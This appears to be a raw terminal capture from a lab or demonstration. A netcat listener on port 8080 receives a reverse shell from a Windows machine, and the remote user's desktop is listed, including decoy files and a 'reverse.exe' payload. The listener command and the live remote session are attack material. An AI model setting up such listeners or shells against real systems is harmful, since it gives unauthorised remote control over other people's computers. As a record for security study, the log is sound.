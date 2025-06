root@hostname: ~# nc -lvnp 8080

Listening on 0.0.0.0 8080

Connection received on 34.45.100.89 49681

ls

Windows PowerShell

Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\ Users\ Bruno\ Desktop> ls

Directory: C:\ Users\ Bruno\ Desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 3/ 5/ 2025 2: 59 PM EEGWXUHVUG

d----- 3/ 5/ 2025 2: 59 PM EFOYFBOLXA

d----- 3/ 5/ 2025 2: 59 PM EOWRVPQCCS

d----- 3/ 5/ 2025 2: 59 PM EWZCVGNOWT

`...

-a---- 3/ 5/ 2025 2: 59 PM 1026 PWCCAWLGRE. pdf

-a---- 3/ 5/ 2025 2: 59 PM 1026 QCFWYSKMHA. jpg

-a---- 5/ 6/ 2025 12: 56 AM 49495 reverse. exe

-a---- 3/ 5/ 2025 2: 59 PM 1026 SFPUSAFIOL. xlsx

-a---- 3/ 5/ 2025 2: 59 PM 1026 SUAVTZKNFL. png